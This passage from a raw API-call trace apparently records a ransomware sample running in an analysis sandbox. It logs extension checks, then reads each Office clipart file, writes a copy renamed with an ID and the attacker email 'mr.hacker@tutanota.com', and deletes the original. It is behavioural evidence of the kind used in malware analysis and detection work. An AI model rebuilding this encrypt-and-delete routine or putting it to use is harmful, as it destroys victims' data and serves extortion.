[0269.312] lstrlenW (lpString=".ppt") returned 4 [0269.312] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.312] lstrlenW (lpString=".zip") returned 4 [0269.312] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.312] lstrlenW (lpString=".rar") returned 4 [0269.312] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString=".bz2") returned 4 [0269.312] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString=".7z") returned 3 [0269.312] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.312] lstrlenW (lpString=".dbf") returned 4 [0269.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.312] lstrlenW (lpString=".1cd") returned 4 [0269.312] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.312] lstrlenW (lpString=".jpg") returned 4 [0269.312] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.312] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.312] lstrlenW (lpString="DD01157_.WMF") returned 12 [0269.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.314] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=3588) returned 1 [0269.314] CloseHandle (hObject=0x348) returned 1 [0269.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf")) returned 0x20 [0269.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.314] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.314] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.314] GetLastError () returned 0x0 [0269.315] ReadFile (in: hFile=0x348, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xe04, lpOverlapped=0x0) returned 1 [0269.316] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xe10, lpOverlapped=0x0) returned 1 [0269.317] ReadFile (in: hFile=0x348, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.317] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.317] SetEndOfFile (hFile=0x384) returned 1 [0269.317] CloseHandle (hObject=0x384) returned 1 [0269.317] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.317] SetEndOfFile (hFile=0x348) returned 1 [0269.319] CloseHandle (hObject=0x348) returned 1 [0269.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf")) returned 1 [0269.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.319] lstrlenW (lpString=".doc") returned 4 [0269.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.319] lstrlenW (lpString=".docx") returned 5 [0269.319] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.319] lstrlenW (lpString=".pdf") returned 4 [0269.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.319] lstrlenW (lpString=".xls") returned 4 [0269.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.320] lstrlenW (lpString=".xlsx") returned 5 [0269.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.320] lstrlenW (lpString=".ppt") returned 4 [0269.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.320] lstrlenW (lpString=".zip") returned 4 [0269.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.320] lstrlenW (lpString=".rar") returned 4 [0269.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.320] lstrlenW (lpString=".bz2") returned 4 [0269.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.320] lstrlenW (lpString=".7z") returned 3 [0269.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.320] lstrlenW (lpString=".dbf") returned 4 [0269.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.320] lstrlenW (lpString=".1cd") returned 4 [0269.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.320] lstrlenW (lpString=".jpg") returned 4 [0269.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.320] lstrlenW (lpString=".doc") returned 4 [0269.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.320] lstrlenW (lpString=".docx") returned 5 [0269.320] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.320] lstrlenW (lpString=".pdf") returned 4 [0269.320] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.321] lstrlenW (lpString=".xls") returned 4 [0269.321] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.321] lstrlenW (lpString=".xlsx") returned 5 [0269.321] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.321] lstrlenW (lpString=".ppt") returned 4 [0269.321] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.321] lstrlenW (lpString=".zip") returned 4 [0269.321] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.321] lstrlenW (lpString=".rar") returned 4 [0269.321] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.321] lstrlenW (lpString=".bz2") returned 4 [0269.321] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.321] lstrlenW (lpString=".7z") returned 3 [0269.321] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.321] lstrlenW (lpString=".dbf") returned 4 [0269.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.321] lstrlenW (lpString=".1cd") returned 4 [0269.321] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0269.366] lstrlenW (lpString=".jpg") returned 4 [0269.366] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.366] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.367] lstrlenW (lpString="DD01166_.WMF") returned 12 [0269.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.404] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2080) returned 1 [0269.404] CloseHandle (hObject=0x3ac) returned 1 [0269.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf")) returned 0x20 [0269.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.486] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.486] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.077] GetLastError () returned 0x0 [0270.078] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x820, lpOverlapped=0x0) returned 1 [0270.079] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x830, lpOverlapped=0x0) returned 1 [0270.080] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.080] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.080] SetEndOfFile (hFile=0x328) returned 1 [0270.080] CloseHandle (hObject=0x328) returned 1 [0270.080] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.080] SetEndOfFile (hFile=0x384) returned 1 [0270.082] CloseHandle (hObject=0x384) returned 1 [0270.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf")) returned 1 [0270.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.083] lstrlenW (lpString=".doc") returned 4 [0270.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.083] lstrlenW (lpString=".docx") returned 5 [0270.083] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.083] lstrlenW (lpString=".pdf") returned 4 [0270.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.083] lstrlenW (lpString=".xls") returned 4 [0270.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.083] lstrlenW (lpString=".xlsx") returned 5 [0270.083] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.083] lstrlenW (lpString=".ppt") returned 4 [0270.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.084] lstrlenW (lpString=".zip") returned 4 [0270.084] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.084] lstrlenW (lpString=".rar") returned 4 [0270.084] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.084] lstrlenW (lpString=".bz2") returned 4 [0270.084] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.084] lstrlenW (lpString=".7z") returned 3 [0270.084] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.084] lstrlenW (lpString=".dbf") returned 4 [0270.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.084] lstrlenW (lpString=".1cd") returned 4 [0270.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.084] lstrlenW (lpString=".jpg") returned 4 [0270.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.084] lstrlenW (lpString=".doc") returned 4 [0270.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.084] lstrlenW (lpString=".docx") returned 5 [0270.084] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.084] lstrlenW (lpString=".pdf") returned 4 [0270.085] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.085] lstrlenW (lpString=".xls") returned 4 [0270.085] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.085] lstrlenW (lpString=".xlsx") returned 5 [0270.085] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.085] lstrlenW (lpString=".ppt") returned 4 [0270.085] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.085] lstrlenW (lpString=".zip") returned 4 [0270.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.085] lstrlenW (lpString=".rar") returned 4 [0270.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.085] lstrlenW (lpString=".bz2") returned 4 [0270.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.085] lstrlenW (lpString=".7z") returned 3 [0270.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.085] lstrlenW (lpString=".dbf") returned 4 [0270.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.085] lstrlenW (lpString=".1cd") returned 4 [0270.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0270.086] lstrlenW (lpString=".jpg") returned 4 [0270.086] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.086] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.086] lstrlenW (lpString="DD01186_.WMF") returned 12 [0270.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.086] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=8564) returned 1 [0270.086] CloseHandle (hObject=0x384) returned 1 [0270.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf")) returned 0x20 [0270.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.087] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.087] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.087] GetLastError () returned 0x0 [0270.087] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x2174, lpOverlapped=0x0) returned 1 [0270.088] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x2180, lpOverlapped=0x0) returned 1 [0270.089] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.089] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.089] SetEndOfFile (hFile=0x328) returned 1 [0270.090] CloseHandle (hObject=0x328) returned 1 [0270.090] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.090] SetEndOfFile (hFile=0x384) returned 1 [0270.092] CloseHandle (hObject=0x384) returned 1 [0270.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.092] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf")) returned 1 [0270.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.092] lstrlenW (lpString=".doc") returned 4 [0270.092] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.093] lstrlenW (lpString=".docx") returned 5 [0270.093] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.093] lstrlenW (lpString=".pdf") returned 4 [0270.093] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.093] lstrlenW (lpString=".xls") returned 4 [0270.093] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.093] lstrlenW (lpString=".xlsx") returned 5 [0270.093] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.093] lstrlenW (lpString=".ppt") returned 4 [0270.093] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.093] lstrlenW (lpString=".zip") returned 4 [0270.093] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.093] lstrlenW (lpString=".rar") returned 4 [0270.093] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.093] lstrlenW (lpString=".bz2") returned 4 [0270.093] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.093] lstrlenW (lpString=".7z") returned 3 [0270.093] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.093] lstrlenW (lpString=".dbf") returned 4 [0270.093] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.093] lstrlenW (lpString=".1cd") returned 4 [0270.093] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.094] lstrlenW (lpString=".jpg") returned 4 [0270.094] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.094] lstrlenW (lpString=".doc") returned 4 [0270.094] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.094] lstrlenW (lpString=".docx") returned 5 [0270.094] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.094] lstrlenW (lpString=".pdf") returned 4 [0270.094] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.094] lstrlenW (lpString=".xls") returned 4 [0270.094] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.094] lstrlenW (lpString=".xlsx") returned 5 [0270.094] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.094] lstrlenW (lpString=".ppt") returned 4 [0270.094] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.094] lstrlenW (lpString=".zip") returned 4 [0270.094] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.094] lstrlenW (lpString=".rar") returned 4 [0270.094] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.094] lstrlenW (lpString=".bz2") returned 4 [0270.094] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.094] lstrlenW (lpString=".7z") returned 3 [0270.095] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.095] 